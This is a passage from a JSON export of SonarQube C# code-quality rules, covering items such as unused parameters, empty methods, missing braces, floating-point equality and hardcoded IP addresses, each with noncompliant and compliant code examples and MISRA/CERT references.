href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/soUbAQ\">CERT, ERR05-J.<\/a> - Do not let checked exceptions escape from a finally block\n <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1172","repo":"csharpsquid","name":"Unused method parameters should be removed","htmlDesc":"<p>Unused parameters are misleading. Whatever the values passed to such parameters, the behavior will be the same.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvoid DoSomething(int a, int b) \/\/ \"b\" is unused\n{\n Compute(a);\n}\n\nvoid DoSomething2(int a) \/\/ value of \"a\" is unused\n{\n a = 10;\n Compute(a);\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvoid DoSomething(int a)\n{\n Compute(a);\n}\n\nvoid DoSomething2()\n{\n var a = 10;\n Compute(a);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p><code>virtual<\/code>, <code>override<\/code> methods and interface implementations are ignored. <\/p>\n<pre>\noverride void DoSomething(int a, int b) \/\/ no issue reported on b\n{\n Compute(a);\n}\n<\/pre>\n<p>Furthermore, the <code>this<\/code> parameter of extension methods is also ignored.<\/p>\n<pre>\npublic static class Extensions\n{\n public static void MyHelper(this HtmlHelper helper) \/\/no issue reported here\n {\n \/\/ no use of helper here\n }\n}\n<\/pre>\n<p>Methods that have attributes defined on them are ignored.<\/p>\n<pre>\npublic class MyDto\n{\n public string Name { get; set; }\n\n [OnDeserialized]\n private void OnDeserialized(StreamingContext context)\n {\n \/\/ ...\n }\n}\n<\/pre>\n<p>Empty or unsupported methods are ignored.<\/p>\n<pre>\npublic void DoSomething()\n{}\n\npublic void Call()\n{\n throw new NotImplementedException();\n}\n<\/pre>\n<p>And obviously no issue is raised on the <code>static void Main(string[] args)<\/code> method<\/p>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C++:2008, 0-1-11 - There shall be no unused parameters (named or unnamed) in nonvirtual functions. <\/li>\n <li> MISRA C:2012, 2.7 - There should be no unused parameters in functions <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1186","repo":"csharpsquid","name":"Methods should not be empty","htmlDesc":"<p>There are several reasons for a method not to have a method body:<\/p>\n<ul>\n <li> It is an unintentional omission, and should be fixed. <\/li>\n <li> It is not yet, or never will be, supported. In this case a <code>NotSupportedException<\/code> should be thrown. <\/li>\n <li> The method is an intentionally-blank override. In this case a nested comment should explain the reason for the blank override. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic override void DoSomething()\n{\n}\n\npublic override void DoSomethingElse()\n{\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic override void DoSomething()\n{\n \/\/ Do nothing because of X and Y.\n}\n\npublic override void DoSomethingElse()\n{\n throw new NotSupportedException();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The following methods are ignored:<\/p>\n<ul>\n <li> empty <code>virtual<\/code> methods, <\/li>\n <li> empty methods that override an <code>abstract<\/code> method, <\/li>\n <li> empty overrides in test assemblies. <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S121","repo":"csharpsquid","name":"Control structures should use curly braces","htmlDesc":"<p>While not technically incorrect, the omission of curly braces can be misleading, and may lead to the introduction of errors during maintenance.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ the two statements seems to be attached to the if statement, but that is only true for the first one:\nif (condition)\n ExecuteSomething();\n CheckSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition)\n{\n ExecuteSomething();\n CheckSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.8 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n <li> MISRA C:2004, 14.9 - An if (expression) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n compound statement, or another if statement <\/li>\n <li> MISRA C++:2008, 6-3-1 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n <li> MISRA C++:2008, 6-4-1 - An if (condition) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n compound statement, or another if statement <\/li>\n <li> MISRA C:2012, 15.6 - The body of an iteration-statement or a selection-statement shall be a compound-statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1QGMAg\">CERT, EXP19-C.<\/a> - Use braces for the body of an if, for, or while statement\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1226","repo":"csharpsquid","name":"Method parameters and caught exceptions should not be reassigned","htmlDesc":"<p>While it is technically correct to assign to parameters from within method bodies, it is better to use temporary variables to store intermediate\nresults.<\/p>\n<p>This rule will typically detect cases where a constructor parameter is assigned to itself instead of a field of the same name, i.e. when\n<code>this<\/code> was forgotten.<\/p>\n<p>Allowing parameters to be assigned to also reduces the code readability as developers will not be able to know whether the original parameter or\nsome temporary variable is being accessed without going through the whole method.<\/p>\n<p>Moreover, some developers might also expect assignments of method parameters to be visible from callers, which is not the case and can confuse\nthem.<\/p>\n<p>All parameters should be treated as <code>readonly<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass\n{\n public string name;\n\n public MyClass(string name)\n {\n name = name; \/\/ Noncompliant - useless identity assignment\n }\n\n public int Add(int a, int b)\n {\n a = a + b; \/\/ Noncompliant\n\n \/* additional logic *\/\n\n return a; \/\/ Seems like the parameter is returned as is, what is the point?\n }\n\n public static void Main()\n {\n MyClass foo = new MyClass();\n int a = 40;\n int b = 2;\n foo.Add(a, b); \/\/ Variable \"a\" will still hold 40 after this call\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass\n{\n public string name;\n\n public MyClass(string name)\n {\n this.name = name; \/\/ Compliant\n }\n\n public int Add(int a, int b)\n {\n return a + b; \/\/ Compliant\n }\n\n public static void Main()\n {\n MyClass foo = new MyClass();\n int a = 40;\n int b = 2;\n foo.Add(a, b);\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2012, 17.8 - A function parameter should not be modified <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1227","repo":"csharpsquid","name":"break statements should not be used except for switch cases","htmlDesc":"<p><code>break;<\/code> is an unstructured control flow statement which makes code harder to read.<\/p>\n<p>Ideally, every loop should have a single termination condition.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nint i = 0;\nwhile (true)\n{\n if (i == 10)\n {\n break; \/\/ Non-Compliant\n }\n\n Console.WriteLine(i);\n i++;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nint i = 0;\nwhile (i != 10) \/\/ Compliant\n{\n Console.WriteLine(i);\n i++;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1244","repo":"csharpsquid","name":"Floating point numbers should not be tested for equality","htmlDesc":"<p>Floating point math is imprecise because of the challenges of storing such values in a binary representation. Even worse, floating point math is\nnot associative; push a <code>float<\/code> or a <code>double<\/code> through a series of simple mathematical operations and the answer will be\ndifferent based on the order of those operation because of the rounding that takes place at each step.<\/p>\n<p>Even simple floating point assignments are not simple:<\/p>\n<pre>\nfloat f = 0.100000001f; \/\/ 0.1\ndouble d = 0.10000000000000001; \/\/ 0.1\n<\/pre>\n<p>(Results will vary based on compiler and compiler settings)<\/p>\n<p>Therefore, the use of the equality (<code>==<\/code>) and inequality (<code>!=<\/code>) operators on <code>float<\/code> or <code>double<\/code> values\nis almost always an error.<\/p>\n<p>This rule checks for the use of direct and indirect equality\/inequailty tests on floats and doubles.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfloat myNumber = 3.146f;\nif ( myNumber == 3.146f ) \/\/Noncompliant. Because of floating point imprecision, this will be false\n{\n \/\/ ...\n}\n\nif (myNumber <= 3.146f && mNumber >= 3.146f) \/\/ Noncompliant indirect equality test\n{\n \/\/ ...\n}\n\nif (myNumber < 4 || myNumber > 4) \/\/ Noncompliant indirect inequality test\n{\n \/\/ ...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.3 - Floating-point expressions shall not be tested for equality or inequality. <\/li>\n <li> MISRA C++:2008, 6-2-2 - Floating-point expressions shall not be directly or indirectly tested for equality or inequality <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S125","repo":"csharpsquid","name":"Sections of code should not be \"commented out\"","htmlDesc":"<p>Programmers should not comment out code as it bloats programs and reduces readability.<\/p>\n<p>Unused code should be deleted and can be retrieved from source control history if required.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 2.4 - Sections of code should not be \"commented out\". <\/li>\n <li> MISRA C++:2008, 2-7-2 - Sections of code shall not be \"commented out\" using C-style comments. <\/li>\n <li> MISRA C++:2008, 2-7-3 - Sections of code should not be \"commented out\" using C++ comments. <\/li>\n <li> MISRA C:2012, Dir. 4.4 - Sections of code should not be \"commented out\" <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S126","repo":"csharpsquid","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x == 0)\n{\n doSomething();\n} else if (x == 1)\n{\n doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x == 0)\n{\n doSomething();\n} else if (x == 1)\n{\n doSomethingElse();\n} else\n{\n throw new IllegalStateException();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S127","repo":"csharpsquid","name":"\"for\" loop stop conditions should be invariant","htmlDesc":"<p>A <code>for<\/code> loop stop condition should test the loop counter against an invariant value (i.e. one that is true at both the beginning and\nending of every loop iteration). Ideally, this means that the stop condition is set to a local variable just before the loop begins. <\/p>\n<p>Stop conditions that are not invariant are slightly less efficient, as well as being difficult to understand and maintain, and likely lead to the\nintroduction of errors in the future.<\/p>\n<p>This rule tracks three types of non-invariant stop conditions:<\/p>\n<ul>\n <li> When the loop counters are updated in the body of the <code>for<\/code> loop <\/li>\n <li> When the stop condition depend upon a method call <\/li>\n <li> When the stop condition depends on an object property, since such properties could change during the execution of the loop. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Foo\n{\n static void Main()\n {\n for (int i = 1; i <= 5; i++)\n {\n Console.WriteLine(i);\n if (condition)\n {\n i = 20;\n }\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Foo\n{\n static void Main()\n {\n for (int i = 1; i <= 5; i++)\n {\n Console.WriteLine(i);\n }\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 13.6 - Numeric variables being used within a <em>for<\/em> loop for iteration counting shall not be modified in the body of the\n loop. <\/li>\n <li> MISRA C++:2008, 6-5-3 - The <em>loop-counter<\/em> shall not be modified within <em>condition<\/em> or <em>statement<\/em>. <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1301","repo":"csharpsquid","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (variable)\n{\n case 0:\n doSomething();\n break;\n default:\n doSomethingElse();\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (variable == 0)\n{\n doSomething();\n}\nelse\n{\n doSomethingElse();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. <\/li>\n <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S131","repo":"csharpsquid","name":"\"switch\/Select\" statements should end with \"default\/Case Else\" clauses","htmlDesc":"<p>The requirement for a final <code>default<\/code> clause is defensive programming. The clause should either take appropriate action, or contain a\nsuitable comment as to why no action is taken. Even when the <code>switch<\/code> covers all current values of an <code>enum<\/code>, a\n<code>default<\/code> case should still be used because there is no guarantee that the <code>enum<\/code> won't be extended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nint foo = 42;\nswitch (foo) \/\/ Noncompliant\n{\n case 0:\n Console.WriteLine(\"foo = 0\");\n break;\n case 42:\n Console.WriteLine(\"foo = 42\");\n break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nint foo = 42;\nswitch (foo) \/\/ Compliant\n{\n case 0:\n Console.WriteLine(\"foo = 0\");\n break;\n case 42:\n Console.WriteLine(\"foo = 42\");\n break;\n default:\n throw new InvalidOperationException(\"Unexpected value foo = \" + foo);\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. <\/li>\n <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1313","repo":"csharpsquid","name":"IP addresses should not be hardcoded","htmlDesc":"<p>Hardcoding an IP address into source code is a bad idea for several reasons:<\/p>\n<ul>\n <li> a recompile is required if the address changes <\/li>\n <li> it forces the same address to be used in every environment (dev, sys, qa, prod) <\/li>\n <li> it places the responsibility of setting the value to use in production on the shoulders of the developer <\/li>\n <li> it allows attackers to decompile the code and thereby discover a potentially sensitive address <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar ip = \"127.0.0.1\";\nvar address = IPAddress.Parse(ip);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar ip = ConfigurationManager.AppSettings[\"myapplication.ip\"];\nvar address = IPAddress.Parse(ip);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Although \"::\" is a valid IPv6 address, the rule doesn't report on it. <\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/qQCHAQ\">CERT, MSC03-J.<\/a> - Never hard code sensitive information <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"VULNERABILITY"},{"key":"csharpsquid:S134","repo":"csharpsquid","name":"Control flow statements \"if\", \"switch\", \"for\", \"foreach\", \"while\", \"do\" and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>switch<\/code>, <code>for<\/code>, <code>foreach<\/code>, <code>while<\/code>, <code>do<\/code>, and <code>try<\/code>\nstatements are key ingredients for making what's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nif (condition1) \/\/ Compliant - depth = 1\n{\n \/* ... *\/\n if (condition2) \/\/ Compliant - depth = 2\n {\n \/* ... *\/\n for(int i = 0; i < 10; i++) \/\/ Compliant - depth = 3, not exceeding the limit\n {\n \/* ... *\/\n if (condition4) \/\/ Noncompliant - depth = 4\n {\n if (condition5) \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n {\n \/* ... *\/\n }\n return;\n }\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"C#","params":[{"key":"max","htmlDesc":"Maximum allowed control flow statement nesting depth.","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"csharpsquid:S1449","repo":"csharpsquid","name":"Culture should be specified for \"string\" operations","htmlDesc":"<p><code>string.ToLower()<\/code>, <code>ToUpper<\/code>, <code>IndexOf<\/code>, <code>LastIndexOf<\/code>, and <code>Compare<\/code> are all\nculture-dependent, as are some (floating point number and <code>DateTime<\/code>-related) calls to <code>ToString<\/code>. Fortunately, all have\nvariants which accept an argument specifying the culture or formatter to use. Leave that argument off and the call will use the system default\nculture, possibly creating problems with international characters.<\/p>\n<p><code>string.CompareTo()<\/code> is also culture specific, but has no overload that takes a culture information, so instead it's better to use\n<code>CompareOrdinal<\/code>, or <code>Compare<\/code> with culture.<\/p>\n<p>Calls without a culture may work fine in the system's \"home\" environment, but break in ways that are extremely difficult to diagnose for customers\nwho use different encodings. Such bugs can be nearly, if not completely, impossible to reproduce when it's time to fix them.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar lowered = someString.ToLower(); \/\/Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar lowered = someString.ToLower(CultureInfo.InvariantCulture);\n<\/pre>\n<p>or<\/p>\n<pre>\nvar lowered = someString.ToLowerInvariant();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/EwAiAg\">CERT, STR02-J.<\/a> - Specify an appropriate locale when comparing\n locale-dependent data <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S1479","repo":"csharpsquid","name":"\"switch\" statements should not have too many \"case\" clauses","htmlDesc":"<p>When <code>switch<\/code> statements have large sets of <code>case<\/code> clauses, it is usually an attempt to map two sets of data. A real map\nstructure would be more readable and maintainable, and should be used instead.<\/p>\n<h2>Exceptions<\/h2>\n<p>This rule ignores <code>switch<\/code>es over <code>Enum<\/code>s and empty, fall-through cases.<\/p>","status":"READY","tags":["rank3"],"langName":"C#","params":[{"key":"maximum","htmlDesc":"Maximum number of case","defaultValue":"30","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"csharpsquid:S1481","repo":"csharpsquid","name":"Unused local variables should be removed","htmlDesc":"<p>If a local variable is declared but not used, it is dead code and should be removed. Doing so will improve maintainability because developers will\nnot wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic int NumberOfMinutes(int hours)\n{\n int seconds = 0; \/\/ seconds is never used\n return hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic int NumberOfMinutes(int hours)\n{\n return hours * 60;\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Unused locally created resources in a <code>using<\/code> statement are not reported.<\/p>\n<pre>\nusing(var t = new TestTimer()) \/\/ t never used, but compliant.\n{\n \/\/...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1643","repo":"csharpsquid","name":"Strings should not be concatenated using '+' in a loop","htmlDesc":"<p><code>StringBuilder<\/code> is more efficient than string concatenation, especially when the operator is repeated over and over as in loops.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nstring str = \"\";\nfor (int i = 0; i < arrayOfStrings.Length ; ++i)\n{\n str = str + arrayOfStrings[i];\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nStringBuilder bld = new StringBuilder();\nfor (int i = 0; i < arrayOfStrings.Length; ++i)\n{\n bld.Append(arrayOfStrings[i]);\n}\nstring str = bld.ToString();\n<\/pre>","status":"READY","tags":["rank1"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1656","repo":"csharpsquid","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic void SetName(string name)\n{\n name = name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic void SetName(string name)\n{\n this.name = name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S1659","repo":"csharpsquid","name":"Multiple variables should not be declared on the same line","htmlDesc":"<p>Declaring multiple variable on one line is difficult to read.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass MyClass\n{\n private int a, b; \/\/ Noncompliant\n\n public void Method()\n {\n int c, d; \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass\n{\n private int a;\n private int b;\n\n public void Method()\n {\n int c;\n int d;\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C++:2008, 8-0-1 - An init-declarator-list or a member-declarator-list shall consist of a single init-declarator or member-declarator\n respectively <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/7wHEAw\">CERT, DCL52-J.<\/a> - Do not declare more than one variable per declaration\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/VgU\">CERT, DCL04-C.<\/a> - Do not declare more than one variable per declaration <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/fAAhAQ\">CERT, DCL04-CPP.<\/a> - Do not declare more than one variable per declaration\n <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1698","repo":"csharpsquid","name":"\"==\" should not be used when \"Equals\" is overridden","htmlDesc":"<p>Using the equality <code>==<\/code> and inequality <code>!=<\/code> operators to compare two objects generally works. The operators can be\noverloaded, and therefore the comparison can resolve to the appropriate method. However, when the operators are used on interface instances, then\n<code>==<\/code> resolves to reference equality, which may result in unexpected behavior if implementing classes override <code>Equals<\/code>.\nSimilarly, when a class overrides <code>Equals<\/code>, but instances are compared with non-overloaded <code>==<\/code>, there is a high chance that\nvalue comparison was meant instead of the reference one.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic interface IMyInterface\n{\n}\n\npublic class MyClass : IMyInterface\n{\n public override bool Equals(object obj)\n {\n \/\/...\n }\n}\n\npublic class Program\n{\n public static void Method(IMyInterface instance1, IMyInterface instance2)\n {\n if (instance1 == instance2) \/\/ Noncompliant, will do reference equality check, but was that intended? MyClass overrides Equals.\n {\n Console.WriteLine(\"Equal\");\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic interface IMyInterface\n{\n}\n\npublic class MyClass : IMyInterface\n{\n public override bool Equals(object obj)\n {\n \/\/...\n }\n}\n\npublic class Program\n{\n public static void Method(IMyInterface instance1, IMyInterface instance2)\n {\n if (object.Equals(instance1, instance2)) \/\/ object.Equals checks for null and then calls the instance based Equals, so MyClass.Equals\n {\n Console.WriteLine(\"Equal\");\n }\n }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The rule does not report on comparisons of <code>System.Type<\/code> instances and on comparisons inside <code>Equals<\/code> overrides.<\/p>\n<p>It also does not raise an issue when one of the operands is <code>null<\/code> nor when one of the operand is cast to <code>object<\/code> (because\nin this case we want to ensure reference equality even if some <code>==<\/code> overload is present).<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/595.html\">MITRE, CWE-595<\/a> - Comparison of Object References Instead of Object Contents <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/597.html\">MITRE, CWE-597<\/a> - Use of Wrong Operator in String Comparison <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/wwD1AQ\">CERT, EXP03-J.<\/a> - Do not use the equality operators when comparing values of\n boxed primitives <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/8AEqAQ\">CERT, EXP50-J.<\/a> - Do not confuse abstract object equality with reference\n equality <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"C#","params":[],"type":"CODE_SMELL"},{"key":"csharpsquid:S1751","repo":"csharpsquid","name":"Jump statements should not be used unconditionally","htmlDesc":"<p>Having an unconditional <code>break<\/code>, <code>return<\/code>, <code>(@)throw<\/code> or <code>goto<\/code> in a loop renders it useless; the loop\nwill only execute once and the loop structure itself is simply wasted keystrokes.<\/p>\n<p>Having an unconditional <code>continue<\/code> in a loop can render the loop meaningless, or is itself wasted keystrokes, depending on where in the\nloop it occurs.<\/p>\n<p>Having an unconditional <code>return<\/code> anywhere other than at the end of a function or method simply renders all the rest of the code in the\nmethod useless.<\/p>\n<p>For these reasons, unconditional jump statements should never be used except for the final <code>return<\/code> in a function or method.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 0; i < 10; i++)\n{\n Console.WriteLine(i);\n break; \/\/ loop only executes once\n}\n\nfor (var i = 0; i < 10; i++)\n{\n continue;\n Console.WriteLine(i); \/\/ this is never executed\n}\n\nfor (var i = 0; i < 10; i++)\n{\n Console.WriteLine(i);\n continue; \/\/ this is meaningless; the loop would continue anyway\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 0; i < 10; i++)\n{\n Console.WriteLine(i);\n}\n\nfor (var i = 0; i < 10; i++)\n{\n Console.WriteLine(i);\n if (ErrorOccurred())\n {\n break;\n }\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.1 - There shall be no unreachable code. <\/li>\n <li> MISRA C++:2008, 0-1-1 - A <em>project<\/em> shall not contain <em>unreachable code<\/em>. <\/li>\n <li> MISRA C++:2008, 0-1-9 - There shall be no dead code. <\/li>\n <li> MISRA C:2012, 2.2 - There shall be no dead code <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n executed <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"C#","params":[],"type":"BUG"},{"key":"csharpsquid:S1858","repo":"csharpsquid","name":"\"ToString()\" calls should not be redundant","htmlDesc":"<p>Invoking a method designed to return a string representation of an object which is already a string is a waste of 